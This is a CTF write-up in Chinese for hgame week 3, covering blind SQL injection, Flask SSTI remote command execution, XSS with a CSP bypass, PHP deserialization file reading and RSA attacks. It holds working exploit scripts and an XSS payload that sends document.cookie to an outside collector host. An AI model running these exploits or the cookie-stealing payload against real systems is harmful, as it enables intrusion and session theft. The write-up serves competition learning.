hgame-week3-writeup

2022-09-19 14:32:03 浏览数 (4)

Web

Liki-Jail

Liki 上周提到这周要盲注,这就来了。

登录页,盲猜后端查询语句是这样的:

代码语言:javascript复制
select xxx from xxx where username='xxxx' and password='xxxx';

然后就开始基于时间的盲注

慢慢试,摸了好几天,然后学了雨神去年的 wp,写了个脚本跑

这里利用了几个点:

  1. 绕过空格:/* */
  2. 引号绕过:使用十六进制

参考资料:SQL注入绕过技巧

代码语言:javascript复制
import httpx
import time
import copy

session = httpx.Client(proxies={'all://':None})

def test(left, right, url, data):
    #二分法爆破
    while left < right:
        print(left,right)
        mid = (left   right) // 2
        temp = copy.deepcopy(data)
        temp['password'] = temp['password'].format(mid)
        print(temp)
        r = session.post(url,data=temp)
        if r.elapsed.seconds < 1.8:
            right = mid
        else:
            left = mid   1
    return left

def str2hex(inputs:str):
    result="0x"
    data= inputs.encode('utf-8')
    for bit in data:
        bit_hex=hex(bit).replace("0x","")
        if len(bit_hex)==1:
            bit_hex="0" bit_hex
        result =bit_hex
    return result

def sql2payload(inputs):
    inputs = inputs.replace(' ','/**/')
    data = {'username':'\',
            'password':'/**/or/**/if(({}),sleep(2),sleep(0))#'.format(inputs)}
    return data

#爆数据库名长度
sql = 'length(database())>{}'
DBNameLength = test(0,64,'https://jailbreak.liki.link/login.php',sql2payload(sql))
# DBNameLength = 9
print('数据库名长度' str(DBNameLength))

#获取数据库名
sql = 'ascii(substr(database(),{},1))>{}'
DBName = ''
for pos in range(1,DBNameLength 1):
    _sql = sql.format(pos,'{}')
    DBName  = chr(test(0,256,'https://jailbreak.liki.link/login.php',sql2payload(_sql)))
# DBName = 'week3sqli'
print(DBName)

#获取数据库表数量(默认只有一位)
sql = 'ascii(substr((select count(table_name) from information_schema.tables where table_schema like {}),1,1)) > {}'.format(str2hex(DBName),'{}')
tableLen = int(chr(test(0,255,'https://jailbreak.liki.link/login.php',sql2payload(sql))))
# tableLen = 1
print('数据库中数据表数量为'   str(tableLen))

# 获取数据库表名
sql = 'ascii(substr((select table_name from information_schema.tables where table_schema like {} limit {},1),{},1)) > {}'.format(str2hex(DBName),'{}','{}','{}')
tableNames = []
for tablePos in range(tableLen):
    # 逐个表名爆
    _sql = sql.format(tablePos,'{}','{}')
    tableName = ''
    pos = 1
    while 1:
        #逐字
        __sql = _sql.format(pos,'{}')
        word = test(0,255,'https://jailbreak.liki.link/login.php',sql2payload(__sql))
        if word == 0:
            tableNames.append(tableName)
            break
        tableName  = chr(word)
        pos  = 1
# tableNames = ['u5ers']
print(tableNames)

# 获取表字段数(默认只有一位)
sql = 'ascii(substr((select count(column_name) from information_schema.columns where table_name like {}),1,1)) > {}'
tablesColumnNum = {} # 各表的字段数
for tableName in tableNames:
    _sql = sql.format(str2hex(tableName),'{}')
    tableColumnNum = int(chr(test(0,255,'https://jailbreak.liki.link/login.php',sql2payload(_sql))))
    tablesColumnNum[tableName] = tableColumnNum
# tablesColumnNum = {'u5ers': 2}
print(tablesColumnNum)

# 获取表字段名
sql = 'ascii(substr((select column_name from information_schema.columns where table_name like {} limit {},1),{},1)) > {}'
tablesColumns = {}
for tableName in tableNames:
    _sql = sql.format(str2hex(tableName),'{}','{}','{}')
    columnNames = []
    for columnPos in range(tablesColumnNum[tableName]):
        # 逐个字段名爆
        __sql = _sql.format(columnPos,'{}','{}')
        columnName = ''
        pos = 1
        while 1:
            #逐字
            ___sql = __sql.format(pos,'{}')
            word = test(0,255,'https://jailbreak.liki.link/login.php',sql2payload(___sql))
            if word == 0:
                columnNames.append(columnName)
                break
            columnName  = chr(word)
            pos  = 1
    tablesColumns[tableName] = columnNames
# tablesColumns = {'u5ers': ['usern@me', 'p@ssword']}
print(tablesColumns)

# 获取字段内容量
sql = 'ascii(substr((select count(`{}`) from {}.{}),1,1))>{}'
tablesColumnsNum = {}
for tableName in tableNames:
    tablesColumnsNum[tableName] = {}
    for column in tablesColumns[tableName]:
        _sql = sql.format(column, DBName, tableName, '{}')
        tablesColumnsNum[tableName][column] = int(chr(test(0,255,'https://jailbreak.liki.link/login.php',sql2payload(_sql))))
# tablesColumnsNum = {'u5ers': {'usern@me': 1, 'p@ssword': 1}}
print(tablesColumnsNum)

# 获取字段内容
sql = 'ascii(substr((select `{}` from {}.{} limit {},1),{},1))>{}'
columnContents = {}
for tableName in tableNames:
    columnContents[tableName] = {}
    for column in tablesColumnsNum[tableName]:
        columnContents[tableName][column] = []
        for offset in range(tablesColumnsNum[tableName][column]):
            columnContent = ''
            pos = 1
            while 1:
                #逐字
                _sql = sql.format(column, DBName, tableName, offset, pos, '{}')
                word = test(0,255,'https://jailbreak.liki.link/login.php',sql2payload(_sql))
                if word == 0:
                    columnContents[tableName][column].append(columnContent)
                    break
                columnContent  = chr(word)
                pos  = 1
print(columnContents)

hgame{7imeB4se_injeCti0n hiDe~th3^5ecRets}

Forgetful

这题和 Flask 的 SSTI 漏洞有关

  • dict:保存类实例或对象实例的属性变量键值对字典
  • class:返回调用的参数类型
  • mro:返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
  • bases:返回类型列表
  • subclasses:返回object的子类
  • init:类的初始化方法
  • globals:函数会以字典类型返回当前位置的全部全局变量 与 func_globals 等价

注册账号后进行测试

代码语言:javascript复制
''.__class__.__mro__[2]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]

查看详情,获取到基类

这里是 Firefox 自动把未闭合标签闭合了,右键查看网页源代码可以看到正常输出

然后获取该基类的子类:

代码语言:javascript复制
{{().__class__.__bases__[0].__subclasses__()}}

找重载过的 __init__ 类,(在获取初始化属性后,带 wrapper 的说明没有重载,寻找不带 warpper 的)

返回为这样的是没有重载的:

代码语言:javascript复制
<slot wrapper '__init__' of 'object' objects>

这样是有重载的:

代码语言:javascript复制
<unbound method WarningMessage.__init__>

写了程序来试:

代码语言:javascript复制
import httpx
from bs4 import BeautifulSoup

session = httpx.Client(proxies={'all://':None})
r = session.get('https://todolist.liki.link/login')
# print(r.content)
csrf_token = BeautifulSoup(r,'lxml').find('input',id='csrf_token')['value']
print(csrf_token)
loginData = {'csrf_token':csrf_token,'username':'test520','password':'test520','submit':'登录'}
r = session.post('https://todolist.liki.link/login',data=loginData)
csrf_token = BeautifulSoup(r,'lxml').find('input',id='csrf_token')['value']
for i in range(100):
    payload = '{}.__class__.__bases__[0].__subclasses__()[' str(i) '].__init__'
    addData = {'csrf_token':csrf_token,'title':'{{' payload '}}','status':'1','submit':'提交'}
    print(addData)
    r = session.post('https://todolist.liki.link/',data=addData)
    soup = BeautifulSoup(r,'lxml')
    csrf_token = soup.find('input',id='csrf_token')['value']
    detailLink = soup.findAll('a',class_='btn-warning')[-1]['href']
    print(detailLink,end='nn')
    r = session.get('https://todolist.liki.link' detailLink)
    output = r.content.decode()[r.content.decode().index('当前Todo: ') 8:r.content.decode().index('</h4><br>n    <h4 class="modal-title" id="myModalLabel" align="center">是否完成')]
    print(output,end='nn')
    output.index('wrapper') # 利用index找不到会报错来终止程序

爆破发现第64个子类重载了 __init__

获取子类可用的函数:

代码语言:javascript复制
{{{}.__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']}}

发现 eval 可调用

利用 eval 就能执行命令,索性直接包装成程序:

代码语言:javascript复制
import httpx
from bs4 import BeautifulSoup

session = httpx.Client(proxies={'all://':None})
r = session.get('https://todolist.liki.link/login')
csrf_token = BeautifulSoup(r,'lxml').find('input',id='csrf_token')['value']
print(csrf_token)
loginData = {'csrf_token':csrf_token,'username':'test520','password':'test520','submit':'登录'}
r = session.post('https://todolist.liki.link/login',data=loginData)
csrf_token = BeautifulSoup(r,'lxml').find('input',id='csrf_token')['value']
while 1:
    command = input('请输入命令:')
    payload = "{}.__class__.__bases__[0].__subclasses__()[64].__init__.__globals__.__builtins__['eval']('__import__("os").popen("" command "").read()')"
    addData = {'csrf_token':csrf_token,'title':'{{' payload '}}','status':'1','submit':'提交'}
    # print(addData)
    r = session.post('https://todolist.liki.link/',data=addData)
    soup = BeautifulSoup(r,'lxml')
    csrf_token = soup.find('input',id='csrf_token')['value']
    detailLink = soup.findAll('a',class_='btn-warning')[-1]['href']
    # print(detailLink,end='nn')
    r = session.get('https://todolist.liki.link' detailLink)
    try:
        output = r.content.decode()[r.content.decode().index('当前Todo: ') 8:r.content.decode().index('</h4><br>n    <h4 class="modal-title" id="myModalLabel" align="center">是否完成')]
        print(output, end='nn')
    except:
        print('解析出错', end='nn')

输入命令 找到flag文件

尝试了cat,tac,more ,less一堆,都不行。盲猜后台根据输出内容直接限制了。

最后使用:

代码语言:javascript复制
od -c ../flag

hgame{h0w_4bou7 L3arn!ng~PythOn^Now?}

还可以读取后转为base64输出(因为其他题目做不下去于是把源码扒出来看了一遍)

也可以这样 md5 一下

Post to zuckonit2.0

审查一下网页源码

之前过于在意 js 的操作,直接就奔着调试器去了,没有认真看网页源码,卡了好几天。

源码下载下来以后,查看过滤部分

再看如何调用的

了解完试如何正则之后,Post:

代码语言:javascript复制
<iframe s src="/replace">

成功插入

然后利用 replacement 和已经插入页面的 “replace”,向 iframe 插入xss代码

先尝试 alert(1) :

因为替换操作在html中执行,所以要注意不要破环执行替换的 script

先使用 iframe 的 srcdoc 元素将 html 插入 iframe 中

设计payload为:

代码语言:javascript复制
"srcdoc="<script>alert(1)</script>

为保证不破坏执行替换的 script 同时保证插入成功,将:

代码语言:javascript复制
"srcdoc="

转为

代码语言:javascript复制
"srcdoc="

将:

代码语言:javascript复制
<script>alert(1)</script>

使用unicode编码(也可使用其他编码形式,只要保证[<>]不被过滤即可):

代码语言:javascript复制
&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

最终 payload:

代码语言:javascript复制
"srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

成功插入

同理开始尝试插入xss代码:

插入成功

后台成功收到

提交给机器人

然后。。。没有响应?

然后就是和学长的一番攀谈交心,想起机器人是访问主界面,所以我应该在主界面中再嵌入一个 iframe ,指向preview界面

再 Post 一个:

代码语言:javascript复制
<iframe s src="/preview">

成功收到

设置 cookie 拿到 flag

hgame{simple_csp_bypass&a_small_mistake_on_the_replace_function}

Post to zuckonit another version

和前一题一样,也是先审查源码

这题过滤多了一点

同样也是 preview 的网页做替换工作

不管别的,iframe 先提交再说

代码语言:javascript复制
<iframe s src="/preview">

然后利用那个替换是使用js做替换而且对替换的内容不做处理

先匹配:

代码语言:javascript复制
(.)iframe src=..preview..(.)

这样就定位到我们提交的iframe的位置了,后面使用或 ‘|’ ,同时还能夹带私货

利用了 RegExp 和他的属性 ‘g’ ,然后再利用正则,把iframe的<>号抓出来给img标签用,

代码语言:javascript复制
(.)iframe src=..preview..(.)|($1img src=x onerror=javascript:this.src='http://xss.www.cn/index.php?do=keepsession&id=LaXxXm&url=' escape(document.location) '&cookie=' escape(document.cookie);$2)

这样预期效果就是:

代码语言:javascript复制
<b class="search_result">(.)iframe src=..preview..(.)|(<img src=x onerror=javascript:this.src='http://xss.www.cn/index.php?do=keepsession&amp;id=LaXxXm&amp;url=' escape(document.location) '&amp;cookie=' escape(document.cookie);>)</b>

提交查询:

代码语言:javascript复制
(.)iframe src=..preview..(.)|($1img src=x onerror=javascript:this.src='http://xss.www.cn/index.php?do=keepsession&id=LaXxXm&url=' escape(document.location) '&cookie=' escape(document.cookie);$2)

本地测试成功

提交给机器人

查看服务器记录(我的xss平台出了点问题导致收不到消息,索性直接翻记录)

拿到token

搞定

hgame{CSP_iS_VerY_5trlct&0nly_C@n_uSe_3vil.Js!}

Arknights

r4u十连了!r4u没出夕和年!r4u自闭了!r4u写了个抽卡模拟器想要证明自己不是非酋,这一切都是鹰角的错。r4u用git部署到了自己的服务器上,然而这一切都被大黑客liki看在了眼里。

这题从题目就可以知道从 git 入手。

用 githacker 获取文件

进行代码审计

发现有反序列化

同时得到如何正确传递反序列化的信息 base64结合md5

查看反序列化触发的位置

尝试构造 payload

复制黏贴再改一改,弄个exp

然后写一个脚本处理 payload

反序列化成功,看到Liki坏坏

然后就是漫长的摸索,利用 CardsPool 中的 __construct 和 __toString ,再配合Eeeeeeevalllllllll 中的 echo 读取文件,是个任意文件读取漏洞。

代码语言:javascript复制
<?php
class CardsPool
{
    public $cards;
    private $file;
    public function __construct($filePath)
    {
        $this->file = $filePath;
    }

    public function __toString(){
        return file_get_contents($this->file);
    }
}

class Eeeeeeevallllllll{
    public $msg="坏坏liki到此一游";
    public function __destruct()
    {
        echo $this->msg;
    }
}

$test = new Eeeeeeevallllllll();
$test->msg = new CardsPool("./pool.php");
print_r(serialize($test));

要注意类型,private和protected的变量名前都是有0×00的,print_r的输出由于是NULL就空过去了。这个小细节没有注意到,倒腾了半个晚上。(实际上我知道这个细节,但是我以为只是空字符没有显示出来,但是复制的时候应该会一起复制走,所以一直没有在意这个点,要深刻反思。)

拿到读取文件的 payload ,丢到脚本里

代码语言:javascript复制
O:17:"Eeeeeeevallllllll":1:{s:3:"msg";O:9:"CardsPool":2:{s:5:"cards";N;s:15:"CardsPoolfile";s:10:"./pool.php";}}

一定要记住在private和protected的变量名前都是有0×00的

代码语言:javascript复制
import base64
import hashlib

data = 'O:17:"Eeeeeeevallllllll":1:{s:3:"msg";O:9:"CardsPool":2:{s:5:"cards";N;s:15:"00CardsPool00file";s:10:"./pool.php";}}'
SECRET_KEY = "7tH1PKviC9ncELTA1fPysf6NYq7z7IA9"
session = base64.b64encode(data.encode(encoding='UTF-8')) b'.' base64.b64encode(hashlib.md5(data.encode() SECRET_KEY.encode()).hexdigest().encode())
print(session)

填入 cookies

成功读到pool.php

本来以为 pool.php 里头藏了 flag。

结果 flag 是在 flag.php 中,Liki说没能找到 flag ,我还以为 flag 很难找,直接把获取文件内容的程序给完善了一下,结果试第一个就出了。

代码语言:javascript复制
import base64
import hashlib
import httpx

while 1:
    fileName = input('请输入文件地址:')
    fileNameLen = str(len(fileName))
    data = 'O:17:"Eeeeeeevallllllll":1:{s:3:"msg";O:9:"CardsPool":2:{s:5:"cards";N;s:15:"00CardsPool00file";s:' fileNameLen ':"' fileName '";}}'
    print(data,end='nn')
    SECRET_KEY = "7tH1PKviC9ncELTA1fPysf6NYq7z7IA9"
    session = base64.b64encode(data.encode(encoding='UTF-8')) b'.' base64.b64encode(hashlib.md5(data.encode() SECRET_KEY.encode()).hexdigest().encode())
    # print(str(session)[2:-1])
    cookies = {"session": str(session)[2:-1]}
    r = httpx.get('http://7a4f4e2209.arknights.r4u.top/', cookies=cookies).content.decode()
    try:
        temp = r[:r.index('<html lang="en">')] # 截取有用的信息(index.php会导致出错以外)
        print()
        print(temp)
    except:
        print('页面出错')

hgame{XI-4Nd-n!AN-D0e5Nt_eX|5T~4t_ALL}

Crypto

LikiPrime

先看一下加密的操作,先将 secrets 数组随机排序,然后分别取出前两个数丢入 get_ prime 求出 p 和 q。

盲猜 secrets 数组不会很大,那么多次获取 n 后,其中必有两个n有公因数。

然后手动获取几次题目,得到多个 n 。

用mgpy2获取一下公因数

成功找到公因数

然后就是枯燥无味的解 rsa

程序如下:

代码语言:javascript复制
import libnum
import gmpy2

n1 = 15361898878235696574667000105109009720717806584760935092206242960407549236363501417213696346370999607974104247856479458833772412536980365740161717369268547876567930581662460946856562030722330783421995955447378594119758550329759849393535018344139103042143621239011469955648205934903904045564846822159998174879695774419450399723970148270141003002902927002767984254099972288746243481084381643719731958360702561818663569730597624966561268824737610893516032068613120089855690580047620589196079907477458543783300282393495461746306096415443274084362956267239186823089349090398919748814938872938478097065267156231648487203329412422615711711886164634059723362167236118521458497248305115764510762731915291882155494011713295462603221439763218477455674584662524137991730891776826849188975650354165106378834014987695592746836998002232826678339919918799781246827459617082687425955430641815518416878015728514477287192934193957833532996687234554280263817068106805440848475668830505180172049674756979856286907198648267160926305328986853052888831678087029867946180609
n4 = 421455057268137623943855130581826670010695787424125483575398783564641774905804241292094489491404078010368108928231613739378723057196150707763465076771136743887645743792429480337282665191759113905477351452687604661932370910619546649016980309127128704196912889482436113968301664065184802718403275566441932610997838594420744542725625369089835898603884842465873796137333422231217780558151579081453050482442480815713888023371806097009026733010675549168891531151463031503487769392933638449687974608310761364013663291522776340420167405179984536987822494653321337710666264607937131444597274723705263700984857724662081511434489432816220704052315794796230167061558323844739991577641137696139034976971120620834491839241524445976160628900208801061487721646073517819705813251737814356857934453635408899953424969351058921296535525652898586206280209211087519688645250498739129308658938793887643661637996930074323463006606640585599948898238215245556143193851301551383887774188493552615734925951375671527105352667838542450376183473659889822337657230288458000424954333331834433907473691512894898086048720146460663598870040517907120196975276637127036440898039790209438552282020873298963230557096195193902471386173063723634310986768157543053601652714130206963511431257764438989910441943467289675619031395812709310167158659929161987322371800772519783732871894602265094632055380313123658370805468895787729810268846662992731442880220367708567278281843728984797991757598241852368778190227221175774287545383420379099242654130282377896190210795413408748016644535143361607704202467109948719631940792634390275040458367000189214605637090341180044461262953283617909526333216836128142485173545881624151994087766224484640246053456234479338867653975606192972308839814170537240390050106021010619105914041749046002023056938838926351260981952851515505853011166663176323135014528257604319991192189816385407590212177524311727412317597062063787864210480343719978961417331119404148767646681957170467643999483804166353759472618987061249
c = 7927187628026055322783940901550651937893953660065534609714001711924456963095603013667085470146144874981960574233466397443449977149997357471575431695025415526421127927424585253533999961265066779103259623451208111709082292139347059312149137665426462381816329178229484680275368657450003046701355985014009700915439417466826446848877329284810802949440433122207430136944380576095681081740197798597559437163702511712448892986978229285577672410865991889634686024629071902793778620692548548234276678653195648305462703623579369309956481606223043040903082180559720551235515700080661234190693094571406679557502413049745325301747588707839920522910923018864009003988475371258742969932381590308381543035539043149634871622927695645953044249331889058081699783884965964986919852075768119185486506729958481688848547730131040350180411446263394686119546781350542737049112800140601734883325024073000156078427592350484379976615561586860882656403198952361411599125358422676828954908797542225611418969233985502900316342896903161811894061826308302594273209131132802270416006
e = 65537

p = gmpy2.gcd(n1,n4)
q = n1//p
print(p)
print(q)
d = libnum.invmod(e, (p - 1) * (q - 1))
print(d)
m = pow(c, d, n1)
print(m)
print(libnum.n2s(int(m)))

hgame{Mers3nne~Pr!Me^re4l1y_s0 5O-li7tle!}

HappyNewYear!!

这题考的是低加密指数广播攻击,利用中国剩余定理。

相关链接:https://skysec.top/2018/09/13/Crypto-RSA多等式攻击总结/#多等式之共模攻击

直接写程序:

代码语言:javascript复制
import gmpy2
import libnum
import itertools

n1 = 768731284506327944113406236027267453153178504481960474163849413572959901900781941471060120664615036667721568236486104212543941626093683611820051956888999990409535944068510533828285247642295156383062225121123397420863524500301605790432399020453905305067131509497931914214431033157498386840010234482484177898191608673445690542041959091445418878375877435164674203776931738708624804301646179653019817596612876848617302959482364008286148292002918372774353441375602500755004724814787928356594079344361596836482525021434616271982920662313256530007883018720585047232121289721656963132683682023625683229940587959315583539720857557451681402228168096559968476948263356605729649774017109848808425693506724312264272613164411551780892434255749213128692122454364559986018251379167331425321803760454026945039856860491038669974395683809854790365463840636343980962376205540013015629307389934488725537142983815565534720739509012176887290320329127809218230756596181528831774086891633290341399153631178022171655153576793324046302349267421556220063264261739968103953460444018066381487941305190730721608513048181450127628562770702172658088836581698332318905758721984778545449145728049393279394785952324627362503706190204128637631213405674863660425389313259
c1 = 722725267571877807402319081826628305252544883884335241258703688920929757984818470073041479840921480077113183869560758029121565524819466778712481183488277905449328223533043391590093655773827799575075615676500130199172201779452716348108026696828323022993975174610207567571651550333881731147356813019258889551558181283524226640533248278854011492561134943798149661873706769482776061146298693713915393175945083367889987571681776927122583376239974702806044792299381370488664195802017823240811394180509440609967345141141653389746431284893972530735438955464348280960825325776483554008537527538106398207335688261344254017151889931214151508915480961509920681364352778795068266724879364096996252272841617341643666522563974346452491302969822483901472736908002176995244808285202644542949151920310938882432565101197174787422479197405599503943928375781580538374853471395003088467545128060029187794431891563377967647568991772201040537299188867383732391802781253804314567562657951501684710262276597091279719861829006628377575073875781088939946651128183090724290607438597560193321130496240482260573568646971658130695308585240404956802017929673317521572608385674052894773447205932790060730005333539795323555614705817665786476411351969424168366962370578

n2 = 524955549822701108820249448341549471789542970374297220719644144467046120999708435027269809717491708384591502747843811858599256578006152409861521624800414221049434790169883523654257416906811451131195855586244598374880878692418389200238536952258677438654818096236001665540878733993916070969439309600669058216532381285131220090854384696479702333190547690812990714884526122724065211294733252863353053612662498096532976972273019631446622835704720241172866721075241553118399444619649756067546482948914446034527197029043296867226467390140262361175465932673129685497666662167082114259368591713670044469780955810420060714389043507570707061129150071885165680539302629323340904857078380746639406842784054066196290404127562974351550470732956889057701068241533469665269708040337792974792839671609064624273734488264409908037327963582749939131119285299618565955038449080047185142908091099286222071106259434530841587125509988124634728986309920606439740930811537598857558982632237868734857663853645411122621117175983417162818791869180350737709034243602399686004808133116046260847513863100560285962053110278579574895754928960943506584372424062481234806423574610837438057911596190771344568064718882123247708570545980147637910744997312960997877114875563
c2 = 341106636902364624537621803937059683829500847731737217024477947229102117868841270816391462580424161421481323287279560344771837711680149251407621544732737892160496443939357041950388493554496406007658435517211507967374859158779641371713073809459356957664870385022506283994639885012608754343497740963582877475346528865751238785898641641562644419639994889039921662499512792397994326679297072288344988329863729467521185656908541750681614296631331948235836697947639517519093825102735706418368162081693311580728579264440449951888361065347124447876814670051679652280281965491150266115964128635848848265679743499256971016535195477416889144131600175159747033626985115139696085153828051183257884668367446309997650590293659781294222777784435987334384194429993199873061206563903159227361936901013994702046575677089263288115905540761147293222721696340819505305497691052766999798297905368576684359681315851605714974267829409740228043899512270242579080482164570677517245195783188509338962785491871370414414487565392656794817257748899014632689366928706013426731920865802714147114118673053353872356444566840336431784793686607763099763915943769968162453433779091468653936247489610842351714130350853888962620401435016019892000066519489369586647822582532

n3 = 531816715051067911629200567254640608407895151120321915934223550416084055941810057275647124365372164691799815654324843152835621657219143971510794565282438719132189708357084269561390602533348667210778967547331570345307713271797500472800693615897738386357322760213782607288672639158771643480519455699144535885754570631972814751649211026584146963569748660071519399459076694805787216533150149579905553101555997182221446716574345192297201707280470099673168021522276021573255431147391095907444654303966368362618307277890450431646680417082866906543559655835992081835168319097576418799442472634041439781110915814527860626840035884588953837943723302497813966476632638781785524454419556109443369209786353302330932241171298568309190081206636347720214268688100661670856945137179076232753814259674913102806389336950363047338944420468292248719856587641014569194752277829684619803918722245724677129232358305719548783148527753735258295780607510739074337299037254055287750082818921964088131910307180760939784520021579399465657665634960365680711736311232219221704752502361047780644838828947578962833367751773943513294960723081845674700714114613905708967183234219078662548527491691822238226973730089750314606177285702898595711912716069746542235493085749
c3 = 96655501480984228476843527875038148766862682735216531181731365068856421448884071634422050543257015201836409006098564512948671369804995159104827331853700167554494548064655395947790619030027666553546707921275511050067552520015915189711919816240838635843727117678456359153157042256845391879627204005136329626204082446757707275024018932620919979573721462329490962992796317057293975350138690301006093906543825995442041881912668467639058815752449994459671712370905576936766284703593791336731603543492278087975208438906947966054673189424532474872122585340933934837935650393646216239318131268109344918651250925428018278665569580645117439459587437729735009669592816057201053074978283319149894796397333902672858475161613255814596817201545193202169499144055305358584644635503323032680354835638327999633796089419073741897835010300917603325122563734141907765815188906909017245236242853269976816696795439826925876239600449014662736919205840699787188466436497530759889271878272675511804209502453822900397006767975864334707665149166220819464748535531766670263050223009402082194467219438612279935716319300498861153496030333202808928006701019408354471055774090532330704743753190920815655232618981877529057446430825964256948001465214314349394508264556

n4 = 493772253520028701228394073791118796898860642546293517165976340880188671501170757992157937835809864375957661380376149183362237960714624594301301578885724183490678033704978135608268473206365825232902155458695063561942608980565675676060170247587203833300205781482210306978615656217675258493239504539762213919984146477146352995349444904282648001338541091894423167804984256356783623092953892148062097076194840351505254447228339051915162949343535017563167413299991340194548813782360554779507722510592683811398509607473468601404587617569337150824778600883884616204746234575349549906287741463102675096118386062231492163458668021511751022439191080507345540921839703382290445797046739813648289321292589201149955672085687445193343364105492343611293348540598587286909499000234416955201612299458282688515658596600656417554161895812046994316423241245289735327450704642000340929459813500971266436908790234452643087694195334024560701562917342963860276789458845939794177422833059051673483227332372905969868740556412782843128761060670334188293944421019131514119696008065850631880588123929581097844255625593530935229341774189341909782979667383762706038731196861300615117475933625813147094849135055190312732335084507955724604696171453417718094964090327
c4 = 357103586677133190400275535608298307096755517917743991779928165944808156555143364562652658318257441161780966754082431346703420213047464905801347987429587866507784835294289240703319363713980965945263022810877492245609589053923882000898807593180841308987573262209122953930711801088265031627560104571585260900206878593365521048031056818241791513449270437055503002833594299287048995560742435886215547766657105383700364572345248814440024509278757886084274494794572349604428103225636768278633773471700470592729438598821712944805975639637427494951822994991131521067141611563925956037672180261640035716517421681741527507431981163704929952037747170161617798150545493396732644456871805542270699764392127056902381387198947947443962667595072777104565429494042828509588406057498452896606672079600318076629291832964611485077778334984817595747726526804076306703817160053516530370696172218743746676413884784385108888108803420106818173901070897426014100110652172248635456173774009497111567782846079335233333617278837527467186444919584161474044529784043912893406555209016056689227249614906221138535989446685926185643604698806909451119908925728900998397084501277736148437741526619184826982588354997162924650747731826227150677994598866694976617038952960

n5 = 400814713999150053337202998177245797185153318108582661287579898596310746501291974666347785576673046001863500878959207830917744556274546158919815600936114953314600540036576429657582500764669413652252770861966417840099061248948771555745832102924038855172611675048290264202872791337710865213077945592130795851795718608065812757968780578674701063411377538597424177722558867587781141897676300153523209675996201871155481412772845570976807158049274849081684209479884845355028703657648486318475977716075670243766212910039942550957289189946628261360037565354423094972917371572096203537186108596979722712819213554550645058717286550110465343100499845761528635976859006285823914211739843983972560292482778326983903018873698437828016668821516581220588836782094261582899393704029819851484331592269664479855215056764839779582417486366182524483986373098489636334412671358130389579972838029202609936524996601129648191606117951616875200119129837212604760319073283133589692257497994855882819655018727368441361317788278857721179085847352853038553208639836433059097775135452611114351766229800268321281856140246610438246783364320786390657242414430601000831387967976691362673290089725234013924339500819390840062916754623424132621350706544122257464089409619
c5 = 196373383105902290020944815248115178565096789884585292930623716947035208071024597949093015291460459688039044997141326097130071826293844614603464306742597764422862382005497313400758917851620553757103374309501021075747571843057781165101330819142446088116279098633113721577451389062207713330184173913814679087349450078308520703743712617560764419518421118924319893700795437644204733301627193873115633309760620284510790535125035058821049861371456491148507101291075161477427293354824377765129256775039894591945559511120167575652522441315757824060660730144970842971698502722588421031575495602989132763560631831054650312859575883607799879434734827000150732042760623153837096529339041007718789464168455505957010471222861988485628012999068075964645262827332446865072284660213544453081529030572364389186506108110484311864485900432885752933720505418233626286434177587041376262805920492740865402092716512672643242061407641167432424410178764502786772854859640601859309316626050634279758623225955757842810086544305493826555445120223896047747445754110537277236254307766447437586975157089685397827540671890607699289450588156013811091193850313213188596446595791898264003078214830341703064110270245588623025485564465677065014954050674151068209958156338

n6 = 441219832102329113941862838660943233579215441091346336934528023475304109965596676163440394813272558320918420480386749091947802455423402857125233908206867132599069595323243154174569298961794344623241293553421864069389535348543832297805982907650367142721566803315107733852453608111246057981064164247187640480712312060234169292599096087422940380874435851795847673883946134398943282297673922785786134668939454715179979246505182510338437251221569074780060511794395438999419581907256239694239236674604727404688764447352994022067990843174130240669289888289862268588307778029283493265348667415910553064457513926134377522099641209108448559373422305901757344324758407462166774699512993336120173336911210734744313930970281023299709778006083933174113456436965150432387778607639217894522770756209157735203091790545289813873886244335031912734705230434179583023235199153300263399767468586679972093973609985111254951924071949408463935260725701129931726900345186925871556853670570762826122383762006869109981003180805851519716186506371242901187230433096494812063568936279012557322219782284461140361225650340807095328622016565443274256310194921729305097890315074292153303546235677671541793456589738387043928232044507842169173330728718482770626654501523
c6 = 343558577020588714429313020041093297550600511001840154137552216575748946157961591099597309730875847249609067088895567357040752583678766229661761073029178667941759812656095394713728367061506713413650132129245164858512061430944849306322427733297033654152161512931139895523891447055784674776356336721195602898082264703411052396223706491835615239898963965039349867576628181946954585002705252796231016445166027513456849060948360498081892030697906086173612576083651879166491789946438067179662219651062279317002050789871120333850272751224872129535742685201837098575125361312611392050300073462884046822571642883949673321736837838379514540827860219307938135197101094531402063240331559853201121385391076154875363696159228373299490035401297769928627372721885488091110000395742964536445855367746227395783716581955884641531132839080847770052153020914740561915612109449417203852452084551679817129684835596664222472806271699238429017096741164052056835664191547244480985004136162585874727015248038703376279042870253365410963230937309995702792020342080115661150163434949942290275789227674559517957243060077741816736950124894466197373209308598030218454826136754312091821659566499445097655483610010997986426784494466843809743836689209926943448276851733

n7 = 320869957563788427035277998523618265705625973417036901203569472342030237447625011870979141578128136960129467546914523329260071050471008896398606988171189642059908517956020915451465313985689287777861360309556861849062064900403692083060786557290591231962941942100771713703136018889848261749140840347546977823595556802430254803837030344591646012857122213227115215674470388548652140381296705772500445572224924018905225174265663584819356114341255408979866800339484643585303306817447453000684770518093577661102544212109378828711785073514863402442870264355300371516683912671007573320059261257897651899697566804513319774954294708303168788292037857134628186553450976637858562675039807897112079750384830264618639239956765667388939331303314191813126254254914926384279494115576997773080256600900034563434959593677148531401160281960526061723479161754555193979726656961515374019212153726594807142456303698775715290518062768887156433902187122160641097916121097179118289646514217696314956474472626420868486152421013284784863653299930875253371982327367991139126828286729539033382650687859412868137579309775440698502848241122394423129771442338402870863767769545005951064956498742874485207824630520777152431261010818838138655082911865834699807375008861
